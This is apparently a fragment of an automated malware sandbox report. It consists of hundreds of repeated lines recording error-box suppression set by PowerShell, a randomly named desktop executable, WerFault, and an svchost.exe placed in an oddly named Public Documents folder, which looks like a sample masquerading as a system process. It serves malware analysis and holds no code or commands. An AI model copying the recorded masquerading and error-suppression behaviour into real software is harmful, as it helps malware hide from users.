    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
